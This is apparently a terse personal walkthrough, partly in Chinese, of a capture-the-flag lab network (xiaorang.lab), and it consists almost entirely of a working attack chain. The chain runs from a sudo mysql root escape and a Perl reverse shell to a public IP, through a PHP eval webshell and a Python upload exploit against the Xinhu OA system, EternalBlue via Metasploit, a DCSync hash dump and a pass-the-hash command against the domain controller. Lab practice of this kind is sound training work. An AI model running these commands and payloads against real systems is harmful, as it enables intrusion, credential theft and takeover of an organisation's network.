Initial

sudo mysql -e '\! /bin/sh' #提权root

nc -lvvp 1133
perl -e 'use Socket;$i="124.71.111.64";$p=1133;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

./fscan -h 172.22.1.0/24

172.22.1.15 thinkphprce 已经拿下
172.22.1.21 XIAORANG-WIN7.xiaorang.lab   MS17-010
172.22.1.2  DC01
172.22.1.18 XIAORANG-OA01 信呼协同办公系统

服务端 ./stowaway_admin -l 1122
客户端 ./stowaway_agent -c 124.71.111.64:1122
服务端 use 0 
服务端 socks 1123

<?php eval($_POST["1"]);?>

import requests
 
 
session = requests.session()
 
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
 
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
 
 
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
 
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
 
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
 
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

proxychains python3 exp.py

172.22.1.15   thinkphprce 已经拿下
172.22.1.21 XIAORANG-WIN7.xiaorang.lab   MS17-010
172.22.1.2  DC01
172.22.1.18 XIAORANG-OA01 信呼协同办公系统 已拿下

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
run

load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"